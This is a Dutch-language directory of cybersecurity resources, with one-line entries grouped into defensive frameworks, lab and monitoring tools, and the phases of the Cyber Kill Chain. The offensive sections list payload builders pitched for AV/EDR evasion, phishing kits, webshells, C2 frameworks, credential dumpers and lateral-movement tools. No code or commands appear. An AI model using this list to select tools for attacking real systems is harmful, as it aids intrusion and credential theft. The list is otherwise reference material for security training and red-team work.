Cyber Security Bronnen

• NIST Cybersecurity Framework Free: Een reeks richtlijnen voor bedrijven in de particuliere sector om beter voorbereid te zijn op het identificeren, detecteren en reageren op cyberaanvallen. (Resources Library, NIST CSF 2.0)
• CIS Controls Free: Prioritaire reeks acties om uw organisatie en gegevens te beschermen tegen bekende vectoren van cyberaanvallen. (Assessment Tool)
• NIST SP 800-53 Free: Beveiligings- en privacycontroles voor informatiesystemen en organisaties. (Machine Readable Data)
• PCI DSS Free: Payment Card Industry Data Security Standard voor organisaties die creditcards verwerken.
• SOC 2 Free: Service Organization Control 2 - Vertrouwensdiensten criteria voor serviceorganisaties.
• COBIT Free: Control Objectives for Information and Related Technologies, een kader voor IT-beheer en governance. (Auditing COBIT 2019)
• ISO 27001/27002 Toolkit Open Source: Een repository met een uitgebreide toolkit die is ontworpen om organisaties te helpen bij het implementeren van het ISO 27001:2022 Information Security Management System (ISMS).
• ISF SOGP Free: De ISF Standard of Good Practice for Information Security (SOGP) is de toonaangevende autoriteit op het gebied van informatiebeveiliging.

• Kali Linux Free: Offensieve toolkit voor scannen, exploitatie en red teaming. Draai in een VM om andere labsystemen te scannen/exploiteren.
• Metasploitable 2 Open Source: Kwetsbare Linux VM voor veilige exploitoefening. Combineer met Kali om exploits te testen & documenteren.
• Vulnerable-AD Open Source: Onveilig Active Directory lab. Gebruik met Windows Server om AD-aanvallen te simuleren.
• WebGoat Free: OWASP kwetsbare webapp. Draai lokaal/Docker & voltooi ingebouwde lessen.
• Juice Shop Free: Moderne OWASP vuln app. Host lokaal & probeer SQLi, XSS, meer.
• GoPhish Open Source: Phishing simulatieplatform. Stuur test-phishing e-mails naar lab-inboxen.
• PortSwigger Commercial: Gratis webbeveiligingslabs. Werk door online exploit-uitdagingen.
• Vulnserver Open Source: Windows buffer overflow server. Draai in Win7 VM & exploiteer met Immunity Debugger.
• Vulnerable WP Open Source: Exploiteerbare WordPress-site. Installeer lokaal & test WP-specifieke exploits.
• CTFlearn Open Source: CTF-uitdagingen voor alle niveaus. Los puzzels op om te verbeteren in domeinen.
• pfSense Free: Firewall/router voor segmentatie. Plaats tussen VM's om verkeer te controleren & inspecteren.
• Suricata Free: IDS/IPS. Implementeer inline met pfSense om dreigingen te detecteren/blokkeren.
• Wazuh Free: SIEM/XDR. Verzamel & analyseer logs van labmachines.
• OpenSearch Free: Zoek/visualisatiestack. Integreer met Wazuh voor evenementendashboards.
• Security Onion Open Source: Dreigingsdetectiesuite. Verwerk labverkeer voor threat hunting.
• Cowrie Open Source: SSH/telnet honeypot. Implementeer geïsoleerd om inlogpogingen te monitoren.
• WireGuard Free: VPN. Verbind veilig op afstand met het labnetwerk.
• Sysmon Free: Windows logging. Installeer om beveiligingsgebeurtenissen bij te houden.
• Ansible Open Source: Automatiseringstool. Push configuraties naar meerdere lab-VM's.
• MITRE Caldera Free: Tegenstander-emulatie. Simuleer aanvallersgedrag in testnetwerken.
• Wireshark Free: Pakketvastlegging/-analyse. Inspecteer verkeer tussen labhosts. (Download)
• Zeek Free: Netwerkmonitoring/-logging. Draai met Security Onion voor diepe analyse. (Download)
• REMnux Free: Malware-analysedistributie. Reverse-engineer veilig in VM. (Download)
• Sigma Open Source: Detectieregels. Schrijf regels & test in Wazuh/Graylog.
• Proxmox VE Open Source: Virtualisatieplatform voor het draaien van uw lab-VM's.
• Docker Free: Platform voor het ontwikkelen, verzenden en draaien van applicaties in containers.
• Portainer Free: Universele containerbeheeromgeving.
• Pi-hole Free: Netwerkbrede advertentieblokkering via uw eigen Linux-hardware.
• T-Pot Open Source: Het alles-in-één honeypotplatform.
• HELK Open Source: De Hunting ELK - Een jachtplatform.
• Ghidra Free: Een software reverse engineering (SRE) suite van tools ontwikkeld door de NSA.
• FlareVM Open Source: Op Windows gebaseerde beveiligingsdistributie voor malware-analyse, incidentrespons, penetratietesten, enz.

• MITRE ATT&CK Free: Een wereldwijd toegankelijke kennisbank van tactieken en technieken van tegenstanders gebaseerd op observaties uit de echte wereld.
• Cyber Kill Chain Free: Ontwikkeld door Lockheed Martin, dit kader identificeert wat de tegenstanders moeten voltooien om hun doel te bereiken.
• Diamond Model Free: Een cognitief model voor inbraakanalyse.
• STRIDE Free: Een methodologie voor dreigingsmodellering ontwikkeld door Microsoft (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege).
• PASTA Free: Process for Attack Simulation and Threat Analysis, een risicogerichte methodologie voor dreigingsmodellering.
• LINDDUN Free: Privacy dreigingsmodelleringskader (Linkability, Identifiability, Non-repudiation, Detectability, Disclosure of information, Unawareness, Non-compliance). (PILLAR AI Tool)
• OCTAVE Free: Operationally Critical Threat, Asset, and Vulnerability Evaluation, een op risico gebaseerde strategische beoordelings- en planningstechniek.
• Trike Free: Een op risico gebaseerde methodologie en tool voor dreigingsmodellering. (GitHub Repo)
• Attack Trees Free: Conceptuele diagrammen die laten zien hoe een activum of doelwit kan worden aangevallen. (ATTop Analysis Tool)

• OWASP Threat Dragon Open Source: Een open source tool voor dreigingsmodellering van OWASP.
• pytm Open Source: Een Pythonic kader voor dreigingsmodellering.
• Threagile Open Source: Agile Dreigingsmodellering Toolkit.
• Threat Composer Open Source: Een eenvoudige tool voor dreigingsmodellering om mensen te helpen de time-to-value te verkorten bij het modelleren van dreigingen.
• Microsoft Threat Modeling Tool Free: Een tool om gegevensstroomdiagrammen te maken om dreigingen te identificeren.

Beveiligingsmonitoring & SIEM

• Sysmon Free: Windows-systeemmonitor die systeemactiviteit bijhoudt en logt naar het Windows-gebeurtenislogboek.
• Wazuh Free: Gratis en open source beveiligingsplatform dat XDR- en SIEM-mogelijkheden verenigt.
• Security Onion Open Source: Een gratis en open platform voor threat hunting, bedrijfsbeveiligingsmonitoring en logbeheer.
• Elastic Security (ELK) Free: Geïntegreerde bescherming voor iedereen.
• Velociraptor Open Source: Tool voor endpoint-zichtbaarheid en verzameling.
• SysmonSearch Open Source: Aggregeert gebeurtenislogboeken gegenereerd door Microsoft's Sysmon.

Incidentrespons & Forensisch Onderzoek

• TheHive Free: Een schaalbaar, open source en gratis Security Incident Response Platform.
• Cortex Open Source: Krachtige Observable Analysis en Active Response Engine.
• SANS SIFT Free: SANS Investigative Forensic Toolkit.
• Autopsy Open Source: Digitaal forensisch platform en grafische interface voor The Sleuth Kit.
• Volatility Open Source: Geavanceerd geheugenforensisch kader.
• KAPE Open Source: Kroll Artifact Parser en Extractor.

Dreigingsinformatie

• MISP Free: Malware Information Sharing Platform en Threat Sharing.
• OpenCTI Open Source: Open Cyber Threat Intelligence Platform.
• YARA Open Source: Het patroonherkennings-zakmes voor malware-onderzoekers.

Analyse & Sandboxing

• Cuckoo Sandbox Free: Geautomatiseerd Malware Analyse Systeem.
• CyberChef Open Source: Het Cyber Zwitserse Zakmes.
• VirusTotal Free: Analyseer verdachte bestanden, domeinen, IP's en URL's.
• OpenSSL Open Source: Beveiligingstoolkit voor SSL- en TLS-cryptografie.
• Pcredz Open Source: Extraheert verschillende typen inloggegevens uit packet capture bestanden.

Applicatiebeveiliging

• SafeLine Open Source: Lichtgewicht web application firewall (WAF) met layer 7 beveiliging.
• Medusa Open Source: Multi-Language Security Scanner with AI-first architecture.

• Sigma Open Source: Generic Signature Format for SIEM Systems.
• Unprotect Project Open Source: Malware evasion techniques knowledge base.
• LOLBAS Open Source: Living Off The Land Binaries, Scripts and Libraries.
• GTFOBins Open Source: List of Unix binaries that can be used to bypass local security restrictions.

Verkenning is de eerste fase van de Cyber Kill Chain, die onderzoek, identificatie en selectie van doelen omvat.

Tools

Scanners & Kaders

• Argus Open Source: Python-powered toolkit voor informatievergaring en verkenning.
• RustScan Open Source: The Modern Port Scanner. Find ports quickly (3 seconds at its fastest). Run scripts through our scripting engine (Python, Lua, Shell supported).
• Amass Open Source: In-depth Attack Surface Mapping and Asset Discovery.
• Nmap Free: The "Network Mapper", free and open source utility for network discovery and security auditing.
• nmapUnleashed Open Source: Een krachtige CLI-wrapper die de mogelijkheden van Nmap verbetert voor penetratietesters en netwerkauditors met multithreading en een dashboard.
• Masscan Open Source: Internet-scale port scanner, transmitting 10 million packets per second.
• Naabu Open Source: A fast port scanning tool written in Go that enumerates valid ports in a reliable manner.
• OpenVAS Free: Full-featured vulnerability scanner with extensive testing capabilities.
• Nikto Open Source: Open Source web server scanner for over 6700 potentially dangerous files/programs.
• Sn1per Open Source: Automated scanner for enumeration and vulnerability scanning.
• Osmedeus Open Source: Workflow engine for offensive security, running awesome tools for recon and vulnerability scanning.
• D0rkerR3con Framework Open Source: Offensive Recon toolkit to discover exposed files, secrets, and launch weaponized Google Dorks.
• Recon-ng Open Source: Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.
• Scanners-Box Open Source: A powerful and open-source toolkit for hackers and security automation.
• Reconness Open Source: ReconNess helps you to run and keep all your recon in the same place.
• Lazyrecon Open Source: Script written in Bash to automate tedious tasks of reconnaissance and information gathering.
• reconFTW Open Source: A powerful automated reconnaissance tool designed for security researchers.
• axiom Open Source: A distributed dynamic infrastructure framework for offensive security operations.
• Trivy Open Source: Uitgebreide en veelzijdige beveiligingsscanner voor kwetsbaarheden en misconfiguraties.

Domein & DNS

• Subfinder Open Source: Subdomain discovery tool that discovers valid subdomains for websites by using passive online sources.
• Puredns Open Source: Fast, professional DNS resolver. Replaces Altdns/Massdns for many workflows.
• Chaos Open Source: Actively scans and maintains internet-wide assets' data.
• Dnsprobe Open Source: Tool built on top of retryabledns that allows you to perform multiple DNS queries.
• Shuffledns Open Source: Wrapper around massdns that allows you to enumerate valid subdomains using active bruteforce.
• Findomain Open Source: Offers dedicated monitoring service for target domains and alerts.
• Dnsgen Open Source: Generates a combination of domain names from the provided input.
• Gotator Open Source: Powerful permutation generation for subdomains.
• Massdns Open Source: High-performance DNS stub resolver.
• Sublert Open Source: Security and reconnaissance tool to leverage certificate transparency for monitoring new subdomains.
• Subjack Open Source: Subdomain Takeover tool written in Go.
• dnscan Open Source: A python wordlist-based DNS subdomain scanner.

Web & OSINT

• X-osint Open Source: OSINT tool die nuttige en geloofwaardige geldige informatie verzamelt over een telefoonnummer, het e-mailadres van de gebruiker en het IP-adres.
• Wappalyzer Free: Browser extension that uncovers the technologies used on websites.
• BuiltWith Free: Helps find out what technologies web pages are using.
• WhatWeb Open Source: Recognizes web technologies including CMS, blogging platforms, statistic/analytics packages, etc.
• Gau Open Source: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
• Waybackurls Open Source: Fetch known URLs from the Wayback Machine.
• Meg Open Source: Tool for fetching lots of URLs without taking a toll on the servers.
• Katana Open Source: A next-generation crawling and spidering framework.
• Feroxbuster Open Source: A Rust-based content discovery tool. Faster, smarter, and more modern than Dirb/DirBuster.
• Dirsearch Open Source: A simple command line tool designed to brute force directories and files in websites.
• Ffuf Open Source: A fast web fuzzer written in Go.
• httpx Free: Fast and multi-purpose HTTP toolkit that allows running multiple probes.
• EyeWitness Open Source: Designed to take screenshots of websites, provide some server header info, and identify default credentials.
• Gowitness Open Source: Website screenshot utility written in Golang using Chrome Headless.
• SpiderFoot Open Source: Open source intelligence (OSINT) automation tool.
• Maltego Commercial: OSINT and graphical link analysis tool for gathering and connecting information.
• Shodan Commercial: Search engine for Internet-connected devices.
• Censys Commercial: Scans the most ports and houses the biggest certificate database in the world.
• Jsluice Open Source: Extract URLs, paths, secrets, and other interesting data from JavaScript source code.
• Unfurl Open Source: Parse URLs and pull out content based on criteria.
• Asnlookup Free: Displays information about an IP address's Autonomous System Number (ASN).
• Virtual-host-discovery Open Source: Enumerates virtual hosts on a given IP address.
• WitnessMe Open Source: Web Inventory tool, takes screenshots of webpages using Pyppeteer.
• BBOT Open Source: Recursive internet scanner designed to be faster and more reliable.
• ENScan_GO Open Source: Tool based on major enterprise information APIs to solve problems in collecting domestic enterprise information (ICP, APP, WeChat, etc.).
• dismap Open Source: Asset discovery and identification tool for rapid web fingerprint recognition.

Cloud & Git

• gitGraber Open Source: Monitor GitHub to search and find sensitive data in real time.
• Shhgit Open Source: Finds secrets and sensitive files across GitHub code and Gists in real-time.
• gitleaks Open Source: SAST tool for detecting hardcoded secrets in git repos.
• cloud_enum Open Source: Multi-cloud OSINT tool.
• S3Scanner Open Source: Scan for open S3 buckets and dump the contents.
• Gato (Github Attack TOolkit) Open Source: Enumeration and attack tool for GitHub organizations.
• apk2url Open Source: OSINT tool to extract IP and URL endpoints from APKs.
• Checkov Open Source: Statische analysetool voor Infrastructure as Code (IaC) beveiliging en compliance.

Social Media

• buster Open Source: An advanced tool for email reconnaissance.
• linkedin2username Open Source: Generate username lists for companies on LinkedIn.
• LinkedInt Open Source: LinkedIn Recon Tool.

Draadloos

• Kismet Open Source: Draadloze netwerkdetector, sniffer en IDS.
• Reaver Open Source: Brute-force aanvalstool voor WPS.
• Fern Wi-Fi Cracker Open Source: Tool voor draadloze beveiligingsaudit en aanval.
• Bully Open Source: WPS brute-force aanvalstool.
• CoWPAtty Open Source: Brute-force WPA2-PSK tool voor het kraken van wachtwoorden.
• InSSIDer Free: Tool voor het scannen van Wi-Fi-netwerken en probleemoplossing.
• Wifite Open Source: Geautomatiseerde draadloze netwerkaudit-tool.
• Wifiphisher Open Source: Framework voor kwaadaardige toegangspunten (rogue access point) voor beveiligingstests via wifi.

Wapenontwikkeling omvat het koppelen van een remote access trojan met een exploit tot een leverbare payload.

Tools (Payload Ontwikkeling)

• Ysoserial Open Source: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
• Payloads All The Things Open Source: A list of useful payloads and bypasses for Web Application Security.
• GhostStrike Open Source: Deploy stealthy reverse shells using advanced process hollowing.
• Ivy Open Source: Payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory.
• PEzor Open Source: Open-Source PE Packer.
• GadgetToJScript Open Source: Generates .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized.
• ScareCrow Open Source: Payload creation framework designed around EDR bypass.
• Donut Open Source: Position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies.
• Mystikal Open Source: macOS Initial Access Payload Generator.
• charlotte Open Source: C++ fully undetected shellcode launcher.
• InvisibilityCloak Open Source: Obfuscation toolkit for C# post-exploitation tools.
• Dendrobate Open Source: Framework that facilitates the development of payloads that hook unmanaged code through managed .NET code.
• Offensive VBA and XLS Entanglement Open Source: Examples of how VBA can be used for offensive purposes.
• xlsGen Open Source: Tiny Excel BIFF8 Generator, to Embedded 4.0 Macros in *.xls.
• darkarmour Open Source: Windows AV Evasion.
• InlineWhispers Open Source: Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF).
• EvilClippy Open Source: Assistant for creating malicious MS Office documents.
• OfficePurge Open Source: VBA purge your Office documents.
• ThreatCheck Open Source: Identifies the bytes that Microsoft Defender / AMSI Consumer flags on.
• CrossC2 Open Source: Generate CobaltStrike's cross-platform payload.
• Ruler Open Source: Tool that allows you to interact with Exchange servers remotely.
• DueDLLigence Open Source: Shellcode runner framework for application whitelisting bypasses and DLL side-loading.
• RuralBishop Open Source: P/Invoke calls replaced with D/Invoke.
• TikiTorch Open Source: Spawns a new process, allocates memory, then uses CreateRemoteThread to run shellcode.
• SharpShooter Open Source: Payload creation framework for the retrieval and execution of arbitrary CSharp source code.
• SharpSploit Open Source: .NET post-exploitation library written in C#.
• MSBuildAPICaller Open Source: MSBuild Without MSBuild.exe.
• macro_pack Open Source: Tool used to automatize obfuscation and generation of MS Office documents, VB scripts, etc.
• inceptor Open Source: Template-Driven AV/EDR Evasion Framework.
• mortar Open Source: Evasion technique to defeat and divert detection and prevention of security products.
• ProtectMyTooling Open Source: Multi-Packer wrapper letting us daisy-chain various packers, obfuscators.
• Freeze Open Source: Payload toolkit for bypassing EDRs using suspended processes, direct syscalls.
• Shhhloader Open Source: Shellcode loader that compiles a C++ stub to bypass AV/EDR.
• DllShimmer Open Source: Weaponize DLL hijacking easily.
• moonwalk Open Source: Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.

Levering is de overdracht van het wapen naar de doelomgeving.

Phishing Tools

• Gophish Open Source: Open-source phishing toolkit designed for businesses and penetration testers.
• Evilginx2 Open Source: Man-in-the-middle attack framework used for phishing credentials and session cookies.
• Modlishka Open Source: Flexible and powerful reverse proxy for ethical phishing campaigns.
• o365-attack-toolkit Open Source: A toolkit to attack Office365.
• PwnAuth Open Source: Web application framework for launching and managing OAuth abuse campaigns.
• goblin Open Source: A simulation phishing system suitable for red-blue confrontation.
• Social-Engineer Toolkit (SET) Open Source: Open-source penetration testing framework designed for social engineering.
• King Phisher Open Source: Phishing-campagne toolkit.
• ReelPhish Open Source: Geautomatiseerde tool voor phishing met tweefactorauthenticatie.
• Ghost Phisher Open Source: Draadloze en ethernet phishing tool.
• Credential Harvester Attack Open Source: Tool in SET voor diefstal van inloggegevens.

Andere Levering & Interactie Tools

• Interactsh Open Source: ProjectDiscovery's OOB interaction server. Critical for blind SSRF/XXE/RCE testing.
• BeEF Open Source: The Browser Exploitation Framework. Focuses on the web browser.

Exploitatie activeert de code van de aanvaller. Deze fase richt zich op kwetsbaarheden om controle te krijgen of code uit te voeren.

Exploitatie Kaders & Tools

• Metasploit Framework Open Source: The world's most used penetration testing framework.
• Burp Suite Commercial: The quintessential web app hacking tool.
• Caido.io Open Source: The lightweight, Rust-based alternative to Burp Suite.
• sqlmap Open Source: Automates the process of detecting and exploiting SQL injection flaws.
• W3AF Open Source: Web Application Attack and Audit Framework.
• Routersploit Open Source: Exploitation framework for embedded devices.
• Commix Open Source: Automated all-in-one OS command injection and exploitation tool.
• Pacu Open Source: The "Metasploit for Cloud." An exploitation framework specifically for AWS.
• ExploitDB Open Source: The official repository of The Exploit Database.
• traitor Open Source: Automatic Linux privesc via exploitation of low-hanging fruit.
• yakit Open Source: Cyber Security ALL-IN-ONE Platform (Exploit, Scanner, Hacking).
• Shannon Open Source: Volledig autonome AI-pentester die daadwerkelijke exploits levert, niet alleen waarschuwingen.
• SploitScan Open Source: Tool ontworpen om het proces van het identificeren van exploits voor bekende kwetsbaarheden en hun respectievelijke kans op uitbuiting te stroomlijnen.
• Core Impact Commercial: Penetratietests en kwetsbaarheidsbeoordelingstool.
• PowerSploit Open Source: Penetratietestframework met PowerShell-scripts.
• Armitage Open Source: Grafische tool voor beheer van cyberaanvallen.

Web & API Exploitatie

• ZAP (Zed Attack Proxy) Free: Integrated penetration testing tool for finding vulnerabilities in web applications.
• OWASP PenTest Kit (PTK) Open Source: Browser-extensie die DAST, IAST, SAST en SCA-mogelijkheden rechtstreeks in de browser integreert, waarbij bevindingen als native waarschuwingen in ZAP worden toegewezen.
• Acunetix Commercial: Automated web application and API security platform.
• Invicti Commercial: Enterprise-grade web application and API security platform.
• Kiterunner Open Source: The best tool for API endpoint discovery (finding hidden/shadow routes).
• Arjun Open Source: Specialized in finding hidden HTTP parameters that other scanners miss.
• Dalfox Open Source: Fast, modern XSS scanner.
• SSRFTest Open Source: SSRF testing tool.
• Jsluice Open Source: Extract URLs, paths, secrets, and other interesting data from JavaScript source code.
• ActiveScan++ Commercial: Burp Suite extension that extends active and passive scanning capabilities.
• Autorize Commercial: Burp Suite extension to detect authorization vulnerabilities.
• Logger++ Commercial: Multi-threaded logging extension for Burp Suite.
• Wpscan Open Source: Black box WordPress security scanner.
• Infection Monkey Open Source: A semi automatic pen testing tool for mapping/pen-testing networks.
• ACSTIS Open Source: AngularJS Client-Side Template Injection scanner.
• padding-oracle-attacker Open Source: CLI tool to execute padding oracle attacks.
• is-website-vulnerable Open Source: Finds publicly known security vulnerabilities in a website's frontend JavaScript libraries.
• PhpSploit Open Source: Full-featured C2 framework which silently persists on webserver via evil PHP oneliner.
• Fortify WebInspect Commercial: Scant en beoordeelt webapplicaties op kwetsbaarheden.
• Skipfish Open Source: Beveiligingsverkenningstool voor webapplicaties.
• Grendel-Scan Open Source: Geautomatiseerde scantool voor webapplicaties.
• Vega Open Source: Web-kwetsbaarheidsscanner en testplatform.
• WebScarab Open Source: Kwetsbaarheidstesttool voor webapplicaties.
• IronWASP Open Source: Testplatform voor beveiliging van webapplicaties.

Initiële Toegang & Privilege Escalatie

• PEASS-ng Open Source: Privilege Escalation Awesome Scripts SUITE.
• NetExec (nxc) Free: The successor to CrackMapExec. The #1 tool for network pentesting (SMB/WinRM spraying, AD enumeration).
• SprayingToolkit Open Source: Scripts to make password spraying attacks.
• CredMaster Open Source: Refactored & improved CredKing password spraying tool.
• Kraken Open Source: All-in-One Toolkit for BruteForce Attacks.
• SweetPotato Open Source: Collection of various native Windows privilege escalation techniques.
• GodPotato Open Source: Privilege escalation using ImpersonatePrivilege.
• PrivKit Open Source: Detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.
• Watson Open Source: Enumerate missing KBs and suggest exploits.
• SharpUp Open Source: C# port of various PowerUp functionality.
• dazzleUP Open Source: Detects privilege escalation vulnerabilities caused by misconfigurations.

Installatie stelt de tegenstander in staat om persistentie in de omgeving te behouden.

Persistentie Tools

• SharPersist Open Source: Windows persistence toolkit written in C#.
• SharpStay Open Source: .NET project for installing Persistence.
• SharpHide Open Source: Tool to create hidden registry keys.
• ScheduleRunner Open Source: C# tool to customize scheduled task for persistence.
• SharpEventPersist Open Source: Persistence by writing/reading shellcode from Event Log.
• IIS-Raid Open Source: A native backdoor module for Microsoft IIS.
• SharPyShell Open Source: Tiny and obfuscated ASP.NET webshell for C# web applications.
• Kraken Open Source: Modular multi-language webshell.
• HiddenDesktop Open Source: HVNC for Cobalt Strike.
• DAMP Open Source: The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.
• reGeorg Open Source: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies.
• ABPTTS Open Source: TCP tunneling over HTTP for web application servers.
• pivotnacci Open Source: A tool to make socks connections through HTTP agents.

Command & Control (C2) kanalen stellen de aanvaller in staat instructies te geven aan de gecompromitteerde apparaten.

Remote Access Tools (RAT) & C2 Kaders

• Cobalt Strike Commercial: Software for Adversary Simulations and Red Team Operations.
• Villain Open Source: High level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells.
• Kubesploit Open Source: Cross-platform post-exploitation HTTP/2 Command & Control server and agent focused on containerized environments.
• Sliver Open Source: General purpose cross-platform implant framework.
• Havoc Open Source: Modern and malleable post-exploitation command and control framework.
• Empire Open Source: Post-exploitation framework that includes a pure-PowerShell Windows agent.
• PoshC2 Open Source: Proxy aware C2 framework.
• Covenant Open Source: .NET command and control framework.
• Mythic Open Source: Cross-platform, post-exploit, red teaming framework.
• Brute Ratel C4 Commercial: Advanced Red Team & Adversary Simulation Software.
• merlin Open Source: Cross-platform post-exploitation C2 server and agent written in Go.
• shad0w Open Source: Post exploitation framework designed to operate covertly.
• Pupy Open Source: Cross-platform remote administration and post-exploitation tool.
• NimPlant Open Source: Light first-stage C2 implant written in Nim and Python.
• SharpC2 Open Source: C2 framework written in C#.
• Nimhawk Open Source: Powerful, modular, lightweight and efficient command & control framework written in Nim.
• AdaptixC2 Open Source: Extensible post-exploitation and adversarial emulation framework.
• Loki Open Source: Node.js Command & Control for Script-Jacking Vulnerable Electron Applications.
• SILENTTRINITY Open Source: Asynchronous, collaborative post-exploitation agent powered by Python and .NET.

Legitieme Remote Access Tools

• ManageEngine Remote Access Plus Commercial: Comprehensive remote desktop tool offering advanced troubleshooting.
• VNC Connect Commercial: Cross-platform remote access solution.
• ISL Online Commercial: Cloud-based remote desktop solution.
• Remote Desktop Manager Commercial: Centralizes remote connections and credentials.
• Supremo Commercial: Lightweight, secure remote control software.
• SolarWinds Dameware Remote Support Commercial: Robust remote support tool.
• AnyDesk Commercial: Fast and lightweight remote desktop application.
• Zoho Assist Commercial: Cloud-based remote support and remote access tool.
• Citrix DaaS Commercial: Desktop-as-a-service solution offering secure remote access.
• Microsoft Quick Assist Free: Simple Windows-based tool for remote assistance.
• NinjaOne Commercial: IT management platform with remote access.
• Atera Commercial: Remote monitoring and management (RMM) platform.

Staging & Redirectors

• RedWarden Open Source: Flexible CobaltStrike Malleable Redirector.
• AzureC2Relay Open Source: Azure Function that validates and relays Cobalt Strike beacon traffic.
• C2concealer Open Source: Generates randomized C2 malleable profiles.
• FindFrontableDomains Open Source: Search for potential frontable domains.
• Domain Hunter Open Source: Checks expired domains for reputation.
• pwndrop Open Source: Self-deployable file hosting service for red teamers.
• C3 Open Source: Custom Command and Control tool.
• Chameleon Open Source: Tool for evading Proxy categorisation.
• redirect.rules Open Source: Dynamic redirect.rules generator.
• SourcePoint Open Source: C2 profile generator for Cobalt Strike.
• RedGuard Open Source: C2 front flow control tool.
• skyhook Open Source: Round-trip obfuscated HTTP file transfer setup.
• GraphStrike Open Source: Cobalt Strike HTTPS beaconing over Microsoft Graph API.

Acties op Doelen is de laatste fase waarin indringers acties ondernemen om hun oorspronkelijke doelen te bereiken, zoals data-exfiltratie of laterale verplaatsing.

Exfiltratie

• SharpExfiltrate Open Source: Modular C# framework to exfiltrate loot over secure channels.
• DNSExfiltrator Open Source: Data exfiltration over DNS request covert channel.
• Egress-Assess Open Source: Tool used to test egress data detection capabilities.
• VeilTransfer Open Source: Data exfiltration utility designed to test and enhance detection capabilities.

Referenties Dumpen

• NetExec (nxc) Free: The successor to CrackMapExec. The #1 tool for network pentesting (SMB/WinRM spraying, AD enumeration).
• TruffleHog Free: The modern standard for finding secrets (API keys, creds) in code. Replaces gitGraber/Shhgit.
• Hashcat Free: The industry standard for password cracking (GPU-based).
• John the Ripper Free: Free and Open Source software, distributed primarily in a source code form.
• Mimikatz Open Source: Allows users to view and save authentication credentials.
• LaZagne Open Source: Retrieve lots of passwords stored on a local computer.
• Dumpert Open Source: LSASS memory dumper using direct system calls and API unhooking.
• CredBandit Open Source: BOF to perform a complete in memory dump of a process.
• CloneVault Open Source: Export and import entries from Windows Credential Manager.
• SharpLAPS Open Source: Retrieve LAPS password from LDAP.
• SharpDPAPI Open Source: C# port of some DPAPI functionality from Mimikatz.
• KeeThief Open Source: Extraction of KeePass 2.X key material from memory.
• SafetyKatz Open Source: Combination of Mimikatz and .NET PE Loader.
• forkatz Open Source: Credential dump using forshaw technique.
• PPLKiller Open Source: Tool to bypass LSA Protection.
• AndrewSpecial Open Source: Dumping lsass' memory stealthily.
• Net-GPPPassword Open Source: .NET implementation of Get-GPPPassword.
• SharpChromium Open Source: Retrieve Chromium data, such as cookies, history and saved logins.
• Chlonium Open Source: Application designed for cloning Chromium Cookies.
• SharpCloud Open Source: Simple C# utility for checking for the existence of credential files.
• pypykatz Open Source: Mimikatz implementation in pure Python.
• nanodump Open Source: A Beacon Object File that creates a minidump of the LSASS process.
• Koh Open Source: C# and BOF toolset to capture user credential material.
• PPLBlade Open Source: Protected Process Dumper Tool.
• TrickDump Open Source: Dump lsass using only NTAPIS.
• RemoteMonologue Open Source: Windows credential harvesting technique leveraging Interactive User RunAs key.
• Cain and Abel Free: Wachtwoordhersteltool voor Windows.
• RainbowCrack Free: Hash-kraker met behulp van rainbow tables.
• THC Hydra Open Source: Geparallelliseerde netwerk login kraker.
• L0phtCrack Open Source: Tool voor controle en herstel van wachtwoorden.

Laterale Verplaatsing

• Ligolo-ng Open Source: The new standard for pivoting/tunneling. Replaces clunky VPN/proxychains setups.
• Responder Open Source: Essential for poisoning LLMNR/NBT-NS protocols to capture hashes.
• Liquid Snake Open Source: Fileless lateral movement using WMI Event Subscriptions.
• PowerUpSQL Open Source: PowerShell Toolkit for Attacking SQL Server.
• SQLRecon Open Source: C# MS SQL toolkit designed for offensive reconnaissance.
• SCShell Open Source: Fileless lateral movement tool that relies on ChangeServiceConfigA.
• SharpRDP Open Source: RDP Console Application for Authenticated Command Execution.
• MoveKit Open Source: Extension of built in Cobalt Strike lateral movement.
• SharpNoPSExec Open Source: File less command execution for lateral movement.
• impacket Open Source: Collection of Python classes for working with network protocols.
• Farmer Open Source: Project for collecting NetNTLM hashes.
• CIMplant Open Source: C# port of WMImplant.
• PowerLessShell Open Source: Rely on MSBuild.exe to remotely execute PowerShell scripts.
• SharpGPOAbuse Open Source: Take advantage of a user's edit rights on a Group Policy Object.
• kerbrute Open Source: Quickly bruteforce and enumerate valid Active Directory accounts.
• mssqlproxy Open Source: Toolkit to perform lateral movement through Microsoft SQL Server.
• Invoke-TheHash Open Source: PowerShell Pass The Hash Utils.
• InveighZero Open Source: .NET IPv4/IPv6 machine-in-the-middle tool.
• SharpSpray Open Source: Password spraying attack against all users of a domain.
• CrackMapExec Open Source: A swiss army knife for pentesting networks.
• SharpAllowedToAct Open Source: C# implementation of a computer object takeover through RBCD.
• SharpRDPHijack Open Source: RDP session hijack utility for disconnected sessions.
• CheeseTools Open Source: Tools based on MiscTool.
• LatLoader Open Source: Automated lateral movement with Havoc C2.
• MalSCCM Open Source: Abuse local or remote SCCM servers.
• Coercer Open Source: Coerce a Windows server to authenticate on an arbitrary machine.
• orpheus Open Source: Bypassing Kerberoast Detections.
• goexec Open Source: Remote execution on Windows devices.
• BitlockMove Open Source: Lateral Movement via Bitlocker DCOM interfaces & COM Hijacking.

Tunneling

• Chisel Open Source: Fast TCP/UDP tunnel, transported over HTTP, secured via SSH.
• frp Open Source: Fast reverse proxy.
• SockTail Open Source: Joins a device to a Tailscale network and exposes a local SOCKS5 proxy.

Netwerk & Analyse

• Wireshark Free: Network protocol analyzer.
• Ettercap Free: Open-source network security tool for man-in-the-middle attacks.
• Bettercap Free: The "Swiss Army knife" for network attacks and monitoring.
• FoxyProxy Free: Advanced proxy management tool.
• CyberChef Open Source: The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis.
• tcpdump Open Source: Opdrachtenregel netwerkpakketanalyse.
